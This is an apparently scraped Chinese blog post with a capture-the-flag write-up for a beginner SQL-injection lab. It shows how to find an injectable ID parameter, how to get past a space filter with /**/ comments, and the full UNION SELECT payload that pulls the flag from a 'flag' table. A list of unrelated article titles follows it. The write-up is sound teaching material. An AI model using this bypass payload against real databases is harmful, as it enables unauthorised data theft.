文章标题
来源:互联网 发布:matlab把向量变成矩阵 编辑:程序博客网 时间:2024/06/02 05:16
实验吧之简单的SQL注入
输入1 观察输出信息
显示出ID值和name,可判断出ID是注入点输入1 and 1=1 和 1 and 1=2
怀疑过滤了and等关键字
再输入1and1=1
可以确定被过滤的是空格绕过空格的方式有一对英文()或者一对注释符/**/
故可构造1/* * /and/**/1=1
猜测flag在flag表中
因此有1’/* * /union/* * /select/* * /flag/ * * /from/ * * /flag/ * * /where/ * * /’1’=’1 (注意单引号需闭合)
得到flag。
阅读全文
0 0
- 文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题 文章标题 文章标题 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- 文章标题
- C# WINFORM判断程序是否运行,且只能运行一个实例
- Python多线程多进程和线性执行的比较
- 关于mysql数据库引擎导致的heibenate的executeUpdate语句不受事务控制
- 深入理解VC
- LeetCode 160 Intersection of Two Linked Lists
- 文章标题
- 关于double与float失精问题解决方案
- android studio ndk环境搭建 和开发
- 读《第一行代码》遇到问题2:Android Device Monitor 文件管理遇到的问题
- Java获得时间戳
- echarts柱状图不同颜色与显示数值
- vs命令行工具在启动时报错
- Eclipse启动都会Error when loading the SDK
- 从今天开始,记录一些自己的摸索历程